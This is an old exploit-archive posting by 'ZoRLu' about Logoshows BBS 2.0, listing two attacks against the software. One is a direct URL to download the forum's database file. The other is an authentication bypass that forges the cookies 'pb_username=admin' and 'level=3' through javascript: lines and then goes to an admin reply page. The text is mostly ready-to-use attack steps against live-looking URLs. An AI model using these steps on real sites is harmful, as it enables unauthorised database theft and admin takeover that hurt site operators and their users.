[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Logoshows BBS 2.0 (DD/ICH) Multiple Remote Vulnerabilities
# Published : 2009-08-07
# Author : ZoRLu
# Previous Title : Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability
# Next Title : PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities
Logoshows BBS 2.0 DD
ZoRLu
yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info
ref: http://www.milw0rm.com/exploits/9389
vuln:
http://www.logoshows.com/bbs/database/globepersonnel.mdb
Logoshows BBS 2.0 ICH
yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info
ref: http://www.milw0rm.com/exploits/9389
demo:
http://www.logoshows.com/bbs/globepersonnel_login.asp
exploit:
javascript:document.cookie = "pb%5Fusername=admin; path=/";
exploit:
javascript:document.cookie = "level=3; path=/";
after you go here:
after go here:
http://www.logoshows.com/bbs/globepersonnel_reply.asp?id=6&topic=6&recordnum=0
thanks: str0ke and all friends
# www.Syue.com [2009-08-07]